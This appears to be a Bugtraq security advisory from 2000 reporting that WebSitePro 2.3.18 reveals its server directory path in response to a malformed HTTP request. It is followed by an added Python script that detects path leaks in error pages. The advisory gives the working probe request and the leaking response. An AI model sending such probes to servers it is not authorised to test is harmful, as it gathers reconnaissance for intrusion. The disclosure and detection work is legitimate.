




WebSitePro/2.3.18  is revealing Webdirectories









=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Date: Thu, 13 Jan 2000  06:35:25
   From: Lark Lizerman <webmaster@DOC2000.DE>
     To: BUGTRAQ@SECURITYFOCUS.COM
Subject: WebSitePro/2.3.18  is revealing Webdirectories
--------------------------------------------------------------------------------


Dear Bugtraqers,

Description:

WebSite Pro is also revealing the webdirectory of each Website by a simple command line.
This bug is similar to the "IIS revealing webdirectories" bug reported on bugtraq.
On WebSitePro the difference is the way you retrieve the path.


Example:

(Made with MS Windows Telnet Client)


Logfile:

-----------------------------------start-----------------------------------
GET /HTTP1.0\    <------ Our command we send via Telnet on port 80 to the webserver


Response:

Content-length: 186

<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
<BODY bgcolor="White"><H2>Document Moved</H2>
This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here</A>.<P>
</BODY></HTML>
GET /HTTP1.0/
Content-length: 230

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>


------------------------------------end------------------------------------


Here it shows us that the HTML files are in D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat, but an attacker might gain information about the server which should stay
in Admin's hands. On all Webservers, e.g. MS IIS and Apache, the response is "error 404".

-------cut------
Elias: I have some html in this mail, try to send it as clear text, as it is, please.
Else people with html capable browsers will only get half of the logfile.
Thx :-)
------cut------
-------------------------------
Lark Lizerman

lizerman@doc2000.de
-------------------------------
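
A defender-side regression check for the disclosure shown in the log above, as an added example that is not part of the original post: it scans error-page bodies for absolute filesystem paths so a leaking 404 template can be caught before deployment. The regular expressions, function names and the two samples marked as constructed are assumptions of this example.

```python
import html
import re

# Heuristic patterns chosen for this example. A path segment containing a
# space is matched only up to that space, which is still enough to flag it.
WIN_PATH = re.compile(r"(?<![A-Za-z0-9])[A-Za-z]:\\(?:[\w.$~-]+\\)*[\w.$~-]*")
UNIX_PATH = re.compile(r"(?<![\w/.:])/(?:var|srv|home|usr|opt|etc)/[\w./~-]+")

# Body of the 404 response quoted in the post, abridged and re-joined.
PAGE_404 = (
    r"<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H2>404 Not Found</H2>"
    r"The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>"
    r"(D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P></BODY></HTML>"
)
# Constructed samples: a clean 404 that only echoes the requested URL, and an
# error page that writes the backslashes of a path as HTML entities.
CLEAN_404 = "<H2>404 Not Found</H2>The requested URL /home/page was not found."
ENCODED_500 = "<P>Cannot open C:&#92;inetpub&#92;wwwroot&#92;app&#92;web.config</P>"

SAMPLES = [("/HTTP1.0/", PAGE_404), ("/home/page", CLEAN_404), ("/app", ENCODED_500)]


def find_path_leaks(body, request_path=""):
    """Return absolute filesystem paths found in an HTTP response body."""
    text = html.unescape(body)  # also catches paths written as &#92; / &#x5c;
    leaks = [m.group(0) for m in WIN_PATH.finditer(text)]
    for m in UNIX_PATH.finditer(text):
        # An error page may echo the requested URL; that is not a disclosure.
        if not request_path.startswith(m.group(0)):
            leaks.append(m.group(0))
    return leaks


def audit(samples):
    """Return (request_path, leaks) for every response that discloses a path."""
    results = [(path, find_path_leaks(body, path)) for path, body in samples]
    return [(path, leaks) for path, leaks in results if leaks]


if __name__ == "__main__":
    for path, leaks in audit(SAMPLES):
        print(f"{path}: leaked {leaks}")
```
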

